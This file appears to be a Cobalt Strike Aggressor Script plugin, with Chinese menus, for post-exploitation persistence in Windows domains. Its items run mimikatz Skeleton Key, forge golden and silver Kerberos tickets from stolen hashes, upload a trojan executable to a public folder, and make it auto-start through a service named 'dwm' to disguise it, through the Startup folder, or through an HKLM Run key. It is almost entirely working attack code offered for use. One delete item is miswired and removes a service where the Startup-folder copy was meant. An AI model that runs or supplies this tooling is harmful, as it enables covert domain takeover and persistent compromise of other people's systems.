menu "权限维持" {
  item "Skeleton Key"{
    $bid = $1['@'];
    bmimikatz($bid , "misc::skeleton");
  }

  item "白银票据" {
    $bid = $1['@'];
		$dialog = dialog("白银票据", %(user => "administrator", domain => "xxxx.com", sid => "sid", target => "dc.xxxx.com", rc4 => "NTLM", service => "cifs", bid => $bid), &SilverTicket);
    dialog_description($dialog, "生成白银票据，攻击者必须获得目标服务账号的密码ntml-hash值。");
    drow_text($dialog, "domain", "域名: ");
    drow_text($dialog, "sid", "sid: ");
    drow_text($dialog, "target", "目标主机名: ");
    drow_text($dialog, "rc4", "NTLM-hash: ");
    drow_text($dialog, "service", "伪造的服务: ");
    drow_text($dialog, "user", "伪造用户名: ");
    dbutton_action($dialog, "运行");
    dialog_show($dialog);
  }
  sub SilverTicket {
    $user = $3['user'];
    $domain = $3['domain'];
    $sid = $3['sid'];
    $target = $3['target'];
    $rc4 = $3['rc4'];
    $service = $3['service'];
    bmimikatz($bid, "kerberos::golden /domain:$domain /sid:$sid /target:$target /rc4:$rc4 /service:$service /user:$user /ptt exit");
  }

  item "黄金票据" {
    $bid = $1['@'];
		$dialog = dialog("黄金票据", %(admin => "administrator", domain => "xxxx.com", sid => "sid", krbtgt => "NTLM", bid => $bid), &GoldenTicket);
    dialog_description($dialog, "生成黄金票据，攻击者必须获得krbtgt账户的ntml-hash值。");
    drow_text($dialog, "admin", "伪造用户名: ");
    drow_text($dialog, "domain", "域名: ");
    drow_text($dialog, "sid", "sid: ");
    drow_text($dialog, "krbtgt", "krbtgt NTLM-hash: ");
    dbutton_action($dialog, "运行");
    dialog_show($dialog);
  }
  sub GoldenTicket {
    $admin = $3['admin'];
    $domain = $3['domain'];
    $sid = $3['sid'];
    $krbtgt = $3['krbtgt'];
    bmimikatz($bid, "kerberos::golden /admin:$admin /domain:$domain /sid:$sid /krbtgt:$krbtgt /ptt exit");
  }

  menu "自启动运行" {
    item "传马" {
      $bid = $1;
      $dialog = dialog("上传你的马", %(FileName => "/Users/zjun/Downloads/ma.exe", UploadPath => "C:\\Users\\Public\\", bid => $bid), &upload);
      dialog_description($dialog, "上传你的马");
      drow_text($dialog, "FileName",  "本地路径: ");
      drow_text($dialog, "UploadPath",  "上传路径: ");
      dbutton_action($dialog, "上传");
      dialog_show($dialog);
    }
    sub upload {
      bcd($bid, $3['UploadPath']);
      bupload($bid, $3['FileName']);
      }
    menu "自启动服务" {
      item "创建自启动服务" {
        $bid = $1['@'];
        $dialog = dialog("创建自启动服务", %(service => "dwm", program => "C:\\Users\\Public\\ma.exe", bid => $bid), &auto);
        drow_text($dialog, "service", "创建服务名: ");
        drow_text($dialog, "program", "程序路径: ");
        dialog_description($dialog, "添加服务自动运行。");
        dbutton_action($dialog, "运行");
        dialog_show($dialog);
      }
      sub auto {
        $service = $3['service'];
        $program = $3['program'];
        bshell($bid, "sc create $service binPath= $program start= auto");
      }
      item "删除自启动服务" {
        $bid = $1['@'];
        $dialog = dialog("删除自启动服务", %(service => "dwm", bid => $bid), &del);
        drow_text($dialog, "service", "服务名: ");
        dialog_description($dialog, "删除自启动服务。");
        dbutton_action($dialog, "运行");
        dialog_show($dialog);
      }
      sub del{
        $service = $3['service'];
        bshell($bid, "sc delete $service");
      }
    }
    menu "启动文件夹" {
      item "复制至启动文件夹" {
        $bid = $1['@'];
        $dialog = dialog("复制至启动文件夹", %(program => "C:\\Users\\Public\\ma.exe", user => "administrator", bid => $bid), &auto);
        drow_text($dialog, "program", "程序路径: ");
        drow_text($dialog, "user", "用户名: ");
        dialog_description($dialog, "复制至启动文件夹。");
        dbutton_action($dialog, "运行");
        dialog_show($dialog);
      }
      sub auto {
        $program = $3['program'];
        $user = $3['user'];
        bshell($bid, "copy \"$program\" \"C:\\Users\\$user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"");
      }
      item "删除自启动文件夹程序" {
        $bid = $1['@'];
        $dialog = dialog("删除自启动服务", %(program => "dwm", bid => $bid), &del);
        drow_text($dialog, "service", "服务名: ");
        dialog_description($dialog, "删除自启动服务。");
        dbutton_action($dialog, "运行");
        dialog_show($dialog);
      }
      sub del{
        $service = $3['service'];
        bshell($bid, "sc delete $service");
      }
    }
    menu "添加注册表实现自启动" {
      item "添加注册表实现自启动" {
        $bid = $1['@'];
        $dialog = dialog("添加注册表实现自启动", %(program => "C:\\Users\\Public\\ma.exe", name =>"start", bid => $bid), &auto);
        drow_text($dialog, "program", "程序路径: ");
        drow_text($dialog, "name", "名称: ");
        dialog_description($dialog, "添加注册表实现自启动。");
        dbutton_action($dialog, "运行");
        dialog_show($dialog);
      }
      sub auto {
        $program = $3['program'];
        $name = $3['name'];
        bshell($bid, "reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"$name\" /d \"$program\" /f");
      }
      item "删除注册表自启动" {
        $bid = $1['@'];
        $dialog = dialog("删除注册表自启动", %(name => "start", bid => $bid), &del);
        drow_text($dialog, "name", "名称: ");
        dialog_description($dialog, "删除注册表自启动。");
        dbutton_action($dialog, "运行");
        dialog_show($dialog);
      }
      sub del{
        $name = $3['name'];
        bshell($bid, "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"$name\" /f");
      }
    }
  }
}
